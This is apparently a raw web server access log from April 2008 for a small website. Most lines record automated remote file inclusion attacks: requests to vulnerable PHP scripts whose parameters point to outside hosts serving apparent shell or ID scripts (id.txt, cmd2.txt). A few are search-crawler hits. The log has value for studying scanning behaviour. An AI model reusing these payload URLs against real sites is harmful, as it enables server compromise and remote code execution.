203.146.251.123 - - [29/Apr/2008:10:04:05 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:04:07 -0700] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:10:04:07 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:04:07 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:04:08 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:04:08 -0700] "GET /logs/access_080211.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:04:09 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 200 11607 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:04:11 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:04:16 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 200 11607 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:10:04:16 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 200 11590 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:04:17 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:10:04:43 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.60.207.200 - - [29/Apr/2008:10:04:47 -0700] "GET /logs/access_080308.log/redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=http://fairplay.ilabs.at//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.60.207.200 - - [29/Apr/2008:10:04:47 -0700] "GET /redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=http://fairplay.ilabs.at//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.60.207.200 - - [29/Apr/2008:10:04:48 -0700] "GET /logs/redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=http://fairplay.ilabs.at//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:04:50 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:04:54 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.28 - - [29/Apr/2008:10:04:54 -0700] "GET /logs/access_080215.log//errors.....ng/upload/trem/oldbisok??//forums//index.php?name=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:04:54 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.28 - - [29/Apr/2008:10:04:55 -0700] "GET /logs//errors.....ng/upload/trem/oldbisok??//forums//index.php?name=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:05:20 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.145.28.20 - - [29/Apr/2008:10:05:24 -0700] "GET /logs/access_080321.log/zoodvd//index.php?option=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.145.28.20 - - [29/Apr/2008:10:05:24 -0700] "GET /logs/zoodvd//index.php?option=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.28 - - [29/Apr/2008:10:05:27 -0700] "GET /logs/access.log//errors.....ng/upload/trem/oldbisok??//forums//index.php?name=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [29/Apr/2008:10:05:29 -0700] "GET //amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.achenbachschule.de/media/template.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
75.125.151.18 - - [29/Apr/2008:10:05:34 -0700] "GET /logs//amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.achenbachschule.de/media/template.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:05:39 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:05:43 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:05:43 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:10:05:52 -0700] "GET /logs/access_080223.log/lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:10:05:53 -0700] "GET /lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:10:05:53 -0700] "GET /logs/lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:10:05:59 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:10:06:04 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 200 11590 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:06:04 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:10:06:05 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:10:06:07 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:06:09 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:10:06:10 -0700] "GET /logs/access_080219.log/lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:06:11 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:06:22 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.60.207.200 - - [29/Apr/2008:10:06:30 -0700] "GET /logs/access_080210.log/redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=http://fairplay.ilabs.at//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.122.156.59 - - [29/Apr/2008:10:06:35 -0700] "GET /enc/content.php?Home_Path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
222.122.156.59 - - [29/Apr/2008:10:06:35 -0700] "GET /logs/enc/content.php?Home_Path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:06:39 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
64.123.108.73 - - [29/Apr/2008:10:06:50 -0700] "GET /logs//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [29/Apr/2008:10:06:50 -0700] "GET //includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:10:06:51 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:10:06:52 -0700] "GET /logs/access_080124.log//index.php?root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:06:54 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:10:06:55 -0700] "GET //index.php?root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:10:06:55 -0700] "GET /logs//index.php?root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:10:06:55 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:07:06 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:10:07:11 -0700] "GET /logs/access_080229.log//index.php?root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.67.51 - - [29/Apr/2008:10:07:29 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.67.51 - - [29/Apr/2008:10:07:30 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:10:07:45 -0700] "GET /logs/index.php?ort=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:10:07:49 -0700] "GET /index.php?ort=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
84.19.182.247 - - [29/Apr/2008:10:07:51 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
84.19.182.247 - - [29/Apr/2008:10:07:51 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:08:00 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
24.148.29.218 - - [29/Apr/2008:10:08:02 -0700] "GET /logs/access_080107.log/index.php?option=com_joomlaxplorer&action=show_error&dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.148.29.218 - - [29/Apr/2008:10:08:09 -0700] "GET /logs/access.log/index.php?option=com_joomlaxplorer&action=show_error&dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:08:17 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:08:18 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:10:08:23 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:10:08:23 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:10:08:36 -0700] "GET /logs/lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:10:08:37 -0700] "GET /lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:08:37 -0700] "GET /logs/access_080223.log/lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:08:37 -0700] "GET /lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:08:38 -0700] "GET /logs/lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:08:57 -0700] "GET /logs/access_080219.log/lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.95 - - [29/Apr/2008:10:08:58 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.95 - - [29/Apr/2008:10:08:59 -0700] "GET /minamijewelry/dream.psd HTTP/1.0" 200 109304 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:10:09:07 -0700] "GET /logs/cyberfolio/portfolio/msg/view.php?av=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:10:09:08 -0700] "GET /cyberfolio/portfolio/msg/view.php?av=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:10:09:12 -0700] "GET /logs/access_080215.log//errors.....ng/upload/trem/oldbisok??//forums//index.php?name=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:10:09:12 -0700] "GET //errors.....ng/upload/trem/oldbisok??//forums//index.php?name=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
24.148.29.218 - - [29/Apr/2008:10:09:12 -0700] "GET /logs/access_080218.log/index.php?page=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:10:09:13 -0700] "GET /logs//errors.....ng/upload/trem/oldbisok??//forums//index.php?name=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
24.148.29.218 - - [29/Apr/2008:10:09:17 -0700] "GET /index.php?page=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
24.148.29.218 - - [29/Apr/2008:10:09:19 -0700] "GET /logs/index.php?page=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:10:09:25 -0700] "GET /logs/access.log//errors.....ng/upload/trem/oldbisok??//forums//index.php?name=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.153.20.230 - - [29/Apr/2008:10:09:28 -0700] "GET /logs/access_080218.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.27.59.13 - - [29/Apr/2008:10:09:38 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:10:08 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:10:08 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:10:08 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:10:22 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:10:22 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:10:23 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.3 - - [29/Apr/2008:10:10:26 -0700] "GET /logs/access_071214.log/skin/zero_vote/ask_password.php?dir=http://kukekaw.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.145.28.20 - - [29/Apr/2008:10:10:26 -0700] "GET /logs/access_080229.log/zoodvd//index.php?option=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.3 - - [29/Apr/2008:10:10:26 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://kukekaw.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:10:10:30 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:10:10:30 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:10:10:30 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.3 - - [29/Apr/2008:10:10:33 -0700] "GET /logs/access_071215.log/skin/zero_vote/ask_password.php?dir=http://kukekaw.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.141.117.79 - - [29/Apr/2008:10:10:51 -0700] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.153 - - [29/Apr/2008:10:10:51 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
64.141.117.79 - - [29/Apr/2008:10:10:52 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.117.79 - - [29/Apr/2008:10:10:52 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.220 - - [29/Apr/2008:10:11:00 -0700] "GET /blog/index.php/category/motorcycles/ HTTP/1.0" 200 10609 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
70.91.145.249 - - [29/Apr/2008:10:11:27 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 200 11590 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:10:11:33 -0700] "GET /logs/access_080215.log//errors.....ng/upload/trem/oldbisok??//forums//index.php?name=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:10:11:34 -0700] "GET //errors.....ng/upload/trem/oldbisok??//forums//index.php?name=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:10:11:34 -0700] "GET /logs//errors.....ng/upload/trem/oldbisok??//forums//index.php?name=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:11:56 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:12:00 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
193.145.28.20 - - [29/Apr/2008:10:12:01 -0700] "GET /logs/access_080321.log/?mosConfig_absolute_path=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:12:01 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
